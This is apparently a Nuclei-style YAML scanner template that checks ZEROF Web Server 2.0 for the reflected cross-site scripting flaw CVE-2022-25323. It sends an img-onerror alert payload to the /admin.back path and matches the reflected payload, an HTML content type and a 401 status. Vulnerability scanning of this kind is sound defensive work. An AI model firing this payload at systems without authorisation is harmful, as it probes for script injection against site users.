45 lines
1.1 KiB
YAML
45 lines
1.1 KiB
YAML
id: CVE-2022-25323
|
|
|
|
info:
|
|
name: ZEROF Web Server 2.0 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
|
|
reference:
|
|
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
|
|
- https://awillix.ru
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-25323
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:zerof:web_server:*:*:*:*:*:*:*:*
|
|
epss-score: 0.00112
|
|
tags: xss,cve,cve2022,zerof
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'back<img src=x onerror=alert(document.domain)>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 401
|
|
|
|
# Enhanced by mp on 2022/03/07
|